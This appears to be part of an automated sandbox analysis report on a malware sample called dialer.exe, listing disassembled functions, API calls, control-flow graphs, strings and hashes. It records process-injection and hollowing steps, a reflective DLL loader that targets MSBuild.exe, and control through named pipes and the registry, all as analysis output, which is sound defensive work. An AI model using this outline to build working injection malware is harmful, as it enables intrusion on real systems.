                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                            • Part of subcall function 000000014000226C: RegCreateKeyExW.ADVAPI32 ref: 00000001400023BE
                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                            • Part of subcall function 000000014000226C: RegSetKeySecurity.ADVAPI32 ref: 00000001400023FE
                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                          • ExitProcess.KERNEL32 ref: 0000000140002263
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                          • String ID:
                          • API String ID: 3836936051-0
                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                          Non-executed Functions

                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 1400010c0-140001110 call 1400018ac 73 140001116-14000111c 70->73 74 1400014ba-1400014d6 70->74 73->74 75 140001122-140001138 OpenProcess 73->75 75->74 76 14000113e-14000115b OpenProcess 75->76 77 140001161-140001178 K32GetModuleFileNameExW 76->77 78 1400011fd-14000121e NtQueryInformationProcess 76->78 79 1400011aa-1400011b6 CloseHandle 77->79 80 14000117a-140001195 PathFindFileNameW lstrlenW 77->80 81 1400014b1-1400014b4 CloseHandle 78->81 82 140001224-14000122a 78->82 79->78 84 1400011b8-1400011d3 79->84 80->79 83 140001197-1400011a7 StrCpyW 80->83 81->74 82->81 85 140001230-140001248 OpenProcessToken 82->85 83->79 87 1400011d8-1400011ea StrCmpIW 84->87 85->81 86 14000124e-140001274 GetTokenInformation 85->86 88 1400012f1 86->88 89 140001276-14000127f GetLastError 86->89 87->81 90 1400011f0-1400011fb 87->90 92 1400012f8-140001306 CloseHandle 88->92 89->88 91 140001281-140001295 LocalAlloc 89->91 90->78 90->87 91->88 93 140001297-1400012bd GetTokenInformation 91->93 92->81 94 14000130c-140001313 92->94 95 1400012df 93->95 96 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 93->96 94->81 97 140001319-140001324 94->97 98 1400012e6-1400012ef LocalFree 95->98 96->98 97->81 99 14000132a-140001334 97->99 98->92 99->81 100 14000133a-140001344 99->100 100->81 101 14000134a-14000138a call 140001ec4 * 3 100->101 101->81 108 140001390-1400013b0 call 140001ec4 StrStrA 101->108 111 1400013b2-1400013c1 108->111 112 1400013c8-1400013ed call 140001ec4 * 2 108->112 111->108 113 1400013c3 111->113 112->81 118 1400013f3-14000141a VirtualAllocEx 112->118 113->81 118->81 119 140001420-140001439 WriteProcessMemory 118->119 119->81 120 14000143b-14000145d call 14000211c 119->120 120->81 123 14000145f-140001467 120->123 123->81 124 140001469-14000146f 123->124 125 140001471-140001476 124->125 126 140001478-140001485 WaitForSingleObject 124->126 127 1400014ab CloseHandle 125->127 128 1400014a6 126->128 129 140001487-14000149b GetExitCodeThread 126->129 127->81 128->127 129->128 130 14000149d-1400014a3 129->130 130->128
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                          • API String ID: 2561231171-3753927220
                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 131 140002560-14000258c 132 140002592 131->132 133 14000273a-140002742 131->133 134 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 132->134 135 140002598-14000259f 132->135 136 140002748-14000274b 133->136 137 14000297e-1400029a2 ReadFile 133->137 138 140002a74-140002a8e 134->138 140 140002704-140002715 134->140 141 1400025a5-1400025a8 135->141 142 1400026bd-1400026bf ExitProcess 135->142 143 140002751-140002756 136->143 144 140002974-140002979 call 14000175c 136->144 137->138 139 1400029a8-1400029af 137->139 139->138 148 1400029b5-1400029c9 call 1400018ac 139->148 140->138 149 14000271b-140002733 call 1400010c0 140->149 150 1400025ae-1400025b1 141->150 151 140002660-14000268b RegOpenKeyExW 141->151 145 140002919-14000292c call 140001944 143->145 146 14000275c-14000275f 143->146 144->138 145->138 173 140002932-140002941 call 140001944 145->173 152 140002761-140002766 146->152 153 14000279d-1400027ae call 140001944 146->153 148->138 171 1400029cf-1400029d5 148->171 174 140002735 149->174 160 140002651-14000265b 150->160 161 1400025b7-1400025ba 150->161 158 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 151->158 159 14000268d-14000269b RegDeleteValueW 151->159 152->138 162 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 152->162 153->138 182 1400027b4-1400027d6 ReadFile 153->182 158->138 159->158 160->138 168 140002644-14000264c 161->168 169 1400025c0-1400025c5 161->169 168->138 169->138 176 1400025cb-1400025ef ReadFile 169->176 180 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 171->180 181 140002a5f 171->181 173->138 197 140002947-14000296f ShellExecuteW 173->197 174->138 176->138 178 1400025f5-1400025fc 176->178 178->138 185 140002602-140002616 call 1400018ac 178->185 200 140002a18-140002a1e 180->200 201 140002a49-140002a4f GetProcessHeap 180->201 187 140002a66-140002a6f call 140002a90 181->187 182->138 189 1400027dc-1400027e3 182->189 185->138 206 14000261c-140002622 185->206 187->138 189->138 196 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 189->196 202 14000290b-140002914 GetProcessHeap 196->202 203 14000282d-140002839 196->203 197->138 200->201 207 140002a20-140002a32 200->207 204 140002a52-140002a5d HeapFree 201->204 202->204 203->202 208 14000283f-14000284b 203->208 204->138 210 140002624-140002633 call 1400010c0 206->210 211 140002638-14000263f 206->211 212 140002a34-140002a36 207->212 213 140002a38-140002a40 207->213 208->202 214 140002851-14000285c 208->214 210->138 211->187 212->213 218 140002a44 call 1400016cc 212->218 213->201 219 140002a42 213->219 215 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 214->215 216 14000285e-140002869 214->216 215->202 216->202 220 14000286f-14000287c call 140001c88 216->220 218->201 219->207 220->202
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                          • String ID: SOFTWARE$dialerstager$open
                          • API String ID: 3276259517-3931493855
                          • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                          • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 227 140001c88-140001cb8 228 140001cbb-140001cc8 227->228 229 140001e8c-140001e91 228->229 230 140001cce-140001d25 CreateProcessW 228->230 229->228 233 140001e97 229->233 231 140001e88 230->231 232 140001d2b-140001d5a VirtualAllocEx 230->232 231->229 234 140001e5d-140001e60 232->234 235 140001d60-140001d7b WriteProcessMemory 232->235 236 140001e99-140001eb9 233->236 237 140001e62-140001e76 OpenProcess 234->237 238 140001e85 234->238 235->234 239 140001d81-140001d87 235->239 237->231 240 140001e78-140001e83 TerminateProcess 237->240 238->231 241 140001dd2-140001def VirtualAlloc 239->241 242 140001d89 239->242 240->231 241->234 243 140001df1-140001e07 GetThreadContext 241->243 244 140001d8c-140001dba WriteProcessMemory 242->244 243->234 246 140001e09-140001e2e WriteProcessMemory 243->246 244->234 245 140001dc0-140001dcc 244->245 245->244 247 140001dce 245->247 246->234 248 140001e30-140001e4c SetThreadContext 246->248 247->241 248->234 249 140001e4e-140001e5b ResumeThread 248->249 249->234 250 140001eba-140001ebf 249->250 250->236
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                          • String ID: @
                          • API String ID: 3462610200-2766056989
                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID: dialersvc64
                          • API String ID: 4184240511-3881820561
                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                          • String ID: M$\\.\pipe\dialerchildproc64
                          • API String ID: 2203880229-3489460547
                          • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                          • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 276 140001000-14000103c RegOpenKeyExW 277 140001099-1400010be RegDeleteKeyExW 276->277 278 14000103e 276->278 279 14000104b-140001091 RegEnumKeyExW 278->279 280 140001093 RegCloseKey 279->280 281 140001040-140001045 RegDeleteKeyW 279->281 280->277 281->279
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Delete$CloseEnumOpen
                          • String ID: SOFTWARE\dialerconfig
                          • API String ID: 3013565938-461861421
                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 282 1400021d0-1400021da 283 1400021dd-1400021f0 call 140001b54 282->283 286 1400021f2-1400021fb Sleep 283->286 287 1400021fd-14000220a ConnectNamedPipe 283->287 286->283 288 140002241-140002246 Sleep 287->288 289 14000220c-14000222d ReadFile 287->289 290 14000224c-140002255 DisconnectNamedPipe 288->290 289->290 291 14000222f-140002234 289->291 290->287 291->290 292 140002236-14000223f 291->292 292->290
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 2071455217-3440882674
                          • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                          • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                          • String ID:
                          • API String ID: 3197395349-0
                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 302 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 303 140002b8e-140002ba1 K32EnumProcesses 302->303 304 140002ba3-140002bb2 303->304 305 140002beb-140002bf4 Sleep 303->305 306 140002bb4-140002bb8 304->306 307 140002bdc-140002be7 304->307 305->303 308 140002bba 306->308 309 140002bcb-140002bd2 306->309 307->305 310 140002bbe-140002bc3 308->310 312 140002bd6-140002bda 309->312 311 140002bc5-140002bc9 310->311 310->312 311->309 311->310 312->306 312->307
                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                          • String ID:
                          • API String ID: 3676546796-0
                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 314 140002a90-140002ad8 CreateFileW 315 140002b25-140002b34 314->315 316 140002ada-140002afc WriteFile 314->316 317 140002b1c-140002b1f CloseHandle 316->317 318 140002afe-140002b00 316->318 317->315 318->317 319 140002b02-140002b16 WriteFile 318->319 319->317
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: File$Write$CloseCreateHandle
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 148219782-3440882674
                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: ntdll.dll
                          • API String ID: 1646373207-2227199552
                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                          Execution Graph

                          Execution Coverage:1.3%
                          Dynamic/Decrypted Code Coverage:94.4%
                          Signature Coverage:0%
                          Total number of Nodes:107
                          Total number of Limit Nodes:16
                          execution_graph 22222 1e8589b5cf0 22223 1e8589b5cfd 22222->22223 22224 1e8589b5d09 22223->22224 22234 1e8589b5e1a 22223->22234 22225 1e8589b5d3e 22224->22225 22226 1e8589b5d8d 22224->22226 22227 1e8589b5d66 SetThreadContext 22225->22227 22227->22226 22228 1e8589b5e41 VirtualProtect FlushInstructionCache 22228->22234 22229 1e8589b5f1e 22240 1e8589b4df0 GetCurrentProcess 22229->22240 22231 1e8589b5efe 22231->22229 22244 1e8589b43e0 VirtualFree 22231->22244 22233 1e8589b5f23 22235 1e8589b5f77 22233->22235 22236 1e8589b5f37 ResumeThread 22233->22236 22234->22228 22234->22231 22245 1e8589b7940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 22235->22245 22237 1e8589b5f6b 22236->22237 22237->22233 22239 1e8589b5fbf 22243 1e8589b4e0c 22240->22243 22241 1e8589b4e53 22241->22233 22242 1e8589b4e22 VirtualProtect FlushInstructionCache 22242->22243 22243->22241 22243->22242 22244->22229 22245->22239 22246 1e8589b3ab9 22249 1e8589b3a06 22246->22249 22247 1e8589b3a70 22248 1e8589b3a56 VirtualQuery 22248->22247 22248->22249 22249->22247 22249->22248 22250 1e8589b3a8a VirtualAlloc 22249->22250 22250->22247 22251 1e8589b3abb GetLastError 22250->22251 22251->22247 22251->22249 22252 1e8589e273c 22253 1e8589e276a 22252->22253 22254 1e8589e27c5 VirtualAlloc 22253->22254 22255 1e8589e27ec 22253->22255 22254->22255 22256 1e8589b28c8 22258 1e8589b290e 22256->22258 22257 1e8589b2970 22258->22257 22260 1e8589b3844 22258->22260 22261 1e8589b3851 StrCmpNIW 22260->22261 22262 1e8589b3866 22260->22262 22261->22262 22262->22258 22263 1e85898273c 22264 1e85898276a 22263->22264 22265 1e8589827c5 VirtualAlloc 22264->22265 22267 1e8589828d4 22264->22267 22265->22267 22268 1e8589827ec 22265->22268 22266 1e858982858 LoadLibraryA 22266->22268 22268->22266 22268->22267 22269 1e8589b554d 22270 1e8589b5554 22269->22270 22271 1e8589b55bb 22270->22271 22272 1e8589b5637 VirtualProtect 22270->22272 22273 1e8589b5663 GetLastError 22272->22273 22274 1e8589b5671 22272->22274 22273->22274 22275 1e8589b1abc 22281 1e8589b1628 GetProcessHeap 22275->22281 22277 1e8589b1ad2 Sleep SleepEx 22279 1e8589b1acb 22277->22279 22279->22277 22280 1e8589b1598 StrCmpIW StrCmpW 22279->22280 22326 1e8589b18b4 9 API calls 22279->22326 22280->22279 22282 1e8589b1648 _invalid_parameter_noinfo 22281->22282 22327 1e8589b1268 GetProcessHeap 22282->22327 22284 1e8589b1650 22285 1e8589b1268 2 API calls 22284->22285 22286 1e8589b1661 22285->22286 22287 1e8589b1268 2 API calls 22286->22287 22288 1e8589b166a 22287->22288 22289 1e8589b1268 2 API calls 22288->22289 22290 1e8589b1673 22289->22290 22291 1e8589b168e RegOpenKeyExW 22290->22291 22292 1e8589b16c0 RegOpenKeyExW 22291->22292 22293 1e8589b18a6 22291->22293 22294 1e8589b16e9 22292->22294 22295 1e8589b16ff RegOpenKeyExW 22292->22295 22293->22279 22338 1e8589b12bc 11 API calls 2 library calls 22294->22338 22297 1e8589b1723 22295->22297 22298 1e8589b173a RegOpenKeyExW 22295->22298 22331 1e8589b104c RegQueryInfoKeyW 22297->22331 22299 1e8589b1775 RegOpenKeyExW 22298->22299 22300 1e8589b175e 22298->22300 22304 1e8589b17b0 RegOpenKeyExW 22299->22304 22305 1e8589b1799 22299->22305 22339 1e8589b12bc 11 API calls 2 library calls 22300->22339 22301 1e8589b16f5 RegCloseKey 22301->22295 22309 1e8589b17d4 22304->22309 22310 1e8589b17eb RegOpenKeyExW 22304->22310 22340 1e8589b12bc 11 API calls 2 library calls 22305->22340 22307 1e8589b176b RegCloseKey 22307->22299 22341 1e8589b12bc 11 API calls 2 library calls 22309->22341 22313 1e8589b1826 RegOpenKeyExW 22310->22313 22314 1e8589b180f 22310->22314 22311 1e8589b17a6 RegCloseKey 22311->22304 22315 1e8589b1861 RegOpenKeyExW 22313->22315 22316 1e8589b184a 22313->22316 22318 1e8589b104c 4 API calls 22314->22318 22320 1e8589b1885 22315->22320 22321 1e8589b189c RegCloseKey 22315->22321 22319 1e8589b104c 4 API calls 22316->22319 22317 1e8589b17e1 RegCloseKey 22317->22310 22322 1e8589b181c RegCloseKey 22318->22322 22323 1e8589b1857 RegCloseKey 22319->22323 22324 1e8589b104c 4 API calls 22320->22324 22321->22293 22322->22313 